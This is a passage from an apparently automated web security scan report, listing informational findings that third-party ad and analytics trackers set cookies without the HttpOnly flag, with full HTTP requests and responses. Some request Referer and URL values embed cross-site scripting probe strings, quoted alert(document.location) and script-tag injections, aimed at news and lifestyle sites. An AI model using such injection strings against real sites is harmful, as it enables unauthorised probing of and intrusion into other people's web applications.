Set-Cookie: TFF=eJyVkz0OgzAMRu%252FCCWwDcTALx%252BjKwFCpW7sh7t7wkwAmrcyAEtB7sa0v9EIo41uQpECoOkLomqahou2FZHwKtuFx7MMCcTtdeJz5UvHUrq9Hj5NmM8IK1YlkdBtJkZw%252FrWcPj%252BHVf4bCaKQp6tzUq%252FeHR2sdTtqdzigoUJI5jwNf38hj06x5kMrDedAz6J5qzM2weBC3V17PkOqg8jhpViPmCNnc850deHMdTtrdzshnbyTwzvsMr2%252Fkwp%252Bz8af%252F0Osb%252BcOYvpgADJg%253D; expires=Tue, 10-Jan-2012 13:06:07 GMT; path=/; domain=.exelator.com
Location: http://dts1.raasnet.com/dts/exelate/in?segments=&t=i
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Server: HTTP server


5.38. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s72097517517395

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mdwsavannah.112.2o7.net
Path:   /b/ss/mdwsavannah/1/H.20.3/s72097517517395

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/mdwsavannah/1/H.20.3/s72097517517395?AQB=1&ndh=1&t=12/8/2011%2012%3A48%3A50%201%20300&ce=ISO-8859-1&pageName=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&g=http%3A//savannahnow.com/&r=http%3A//drupal.org/cases&cc=USD&ch=Savannah%20Morning%20News&server=Savannah%20Morning%20News%20-%20savannahnow.com&pageType=savannahnow.com/&c1=Frontpage&c2=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&c15=SE&c16=Metro&c17=Home&c18=97010%20Home&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: mdwsavannah.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E66430C[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E66430C[CE]; s_vi_atamox7Ecaihem=[CS]v4|273678D105013232-60000102803384B7|4E6CF1A1[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:20 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; Expires=Sat, 10 Sep 2016 12:49:20 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 12:49:20 GMT
Last-Modified: Tue, 13 Sep 2011 12:49:20 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6DFFD0-5DB6-4F3F9D04"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www374
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

5.39. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s83483789157502

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mdwsavannah.112.2o7.net
Path:   /b/ss/mdwsavannah/1/H.20.3/s83483789157502

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/mdwsavannah/1/H.20.3/s83483789157502?AQB=1&ndh=1&t=12/8/2011%2013%3A8%3A42%201%20300&ce=ISO-8859-1&pageName=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&g=http%3A//savannahnow.com/%3F4324a%2527-alert%28document.location%29-%25272befc103ff4%3D1&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cc=USD&ch=Savannah%20Morning%20News&server=Savannah%20Morning%20News%20-%20savannahnow.com&pageType=savannahnow.com/&c1=Frontpage&c2=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&c15=SE&c16=Metro&c17=Home&c18=97010%20Home&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1106&bh=816&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&AQE=1 HTTP/1.1
Host: mdwsavannah.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/?4324a%27-alert(document.location)-%272befc103ff4=1
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; s_vi_iex608x3Bgbx7Dnaxx=[CS]v4|27365326051636CC-400001A380004C94|4E6D4EF3[CE]; s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|273701C005159759-60000176201D1B1E|4E6E037C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:08:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; Expires=Sat, 10 Sep 2016 13:08:24 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 13:08:24 GMT
Last-Modified: Tue, 13 Sep 2011 13:08:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6E0448-1517-3C548CC2"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www637
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

5.40. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s86790688387118

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mdwsavannah.112.2o7.net
Path:   /b/ss/mdwsavannah/1/H.20.3/s86790688387118

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/mdwsavannah/1/H.20.3/s86790688387118?AQB=1&ndh=1&t=12/8/2011%2013%3A4%3A21%201%20300&ce=ISO-8859-1&pageName=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&g=http%3A//savannahnow.com/&r=http%3A//savannahnow.com/&cc=USD&ch=Savannah%20Morning%20News&server=Savannah%20Morning%20News%20-%20savannahnow.com&pageType=savannahnow.com/&c1=Frontpage&c2=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&c15=SE&c16=Metro&c17=Home&c18=97010%20Home&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: mdwsavannah.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E66430C[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E66430C[CE]; s_vi_atamox7Ecaihem=[CS]v4|273678D105013232-60000102803384B7|4E6CF1A1[CE]; s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|2736FFD8051613AB-600001A280003EFD|4E6DFFB0[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:04:04 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; Expires=Sat, 10 Sep 2016 13:04:04 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 13:04:04 GMT
Last-Modified: Tue, 13 Sep 2011 13:04:04 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6E0344-65FF-06BA6CCE"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www427
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

5.41. http://p.raasnet.com/partners/dfp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/dfp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partners/dfp?partner=40046&ord=0.5825194382847674 HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:18:54 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:18:54 GMT;
Content-Type: text/javascript
Content-Length: 21
Date: Mon, 12 Sep 2011 13:05:33 GMT
Connection: close

rasegs='rasegs=seg2';

5.42. http://p.raasnet.com/partners/oxmap

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/oxmap

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partners/oxmap?external_user_id=8ceb81a1-f08d-353c-163f-89b1b78ecd62 HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:07 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close


5.43. http://p.raasnet.com/partners/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /partners/pixel?t=gcm&id=CAESEKhDLfTHbxj77UOiLKpphxM&cver=1 HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=155198643408292; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: lpp=1784c8199cfe69ffd2e65a19; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:08 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close


5.44. http://p.raasnet.com/partners/universal/in

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/universal/in

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:26 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:26 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:06 GMT;
Content-Type: text/html
Content-Length: 207
Date: Mon, 12 Sep 2011 13:06:06 GMT
Connection: close

<img border='0' width='1' height='1' src='http://p.raasnet.com/partners/exelate'/><img border='0' width='1' height='1' src='http://rd.rlcdn.com/rd?site=43881&type=redir&url=http://dts1.raasnet.com/dts
...[SNIP]...

5.45. http://pixel.quantserve.com/api/segments.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /api/segments.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /api/segments.json?a=p-573scDfDoUH6o&callback=qcCallback HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://widget.newsinc.com/_fw/Savannah/toppicks_savannah_top.html
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EIIBIQHYB4HRBprRW9iB4QschAEA

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EH0BGgHYB7vR0b2IHh2EsRA; expires=Sun, 11-Dec-2011 13:07:51 GMT; path=/; domain=.quantserve.com
Set-Cookie: mc=; expires=Thu, 01-Jan-1970 00:00:10 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: application/x-javascript
Cache-Control: private, no-transform, must-revalidate, max-age=600
Expires: Mon, 12 Sep 2011 13:17:51 GMT
Content-Length: 39
Date: Mon, 12 Sep 2011 13:07:51 GMT
Server: QS

qcCallback({"segments":[{"id":"D"}]});

5.46. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=403227748;fpan=1;fpa=P0-1895254174-1315850535699;ns=0;url=http%3A%2F%2Fwww.popsugar.com%2Fajaxharness1274b%2522-alert(document.location)-%2522faa5baba69b%3Fharness_requests%3D%257B%2522replacements%2522%253A%2520%255B%257B%2522sugar-menu-subnav-items%2522%253A%2520%2522%252Fsugar-subnav-items%253Ffastcache%253D1%2526fg_locale%253D0%2522%257D%252C%2520%257B%2522user-feedback-div%2522%253A%2520%2522%252Fsugar-user-feedback-form%253Fissue%253Dinfinite%252520scroll%2522%257D%255D%252C%2520%2522callbacks%2522%253A%2520%255B%255D%257D;ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=site_name.PopSugar;dst=1;et=1315850535698;tzo=300;a=p-36POJYHTosuxU HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/ajaxharness1274b%22-alert(document.location)-%22faa5baba69b?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EAkBHwHXB4GxBprRW9iBACyEAQA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EMMBGAHYB7vR0b2IENhCEA; expires=Sun, 11-Dec-2011 13:01:57 GMT; path=/; domain=.quantserve.com
Set-Cookie: mc=; expires=Thu, 01-Jan-1970 00:00:10 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Mon, 12 Sep 2011 13:01:57 GMT
Server: QS


5.47. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=6432&rnd1315831249 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.dome9.com%2F&jsref=&rnd=1315849265708
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3152310.js^1^1315405364^1315405364&3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1%266432%3D1%266286%3D1; 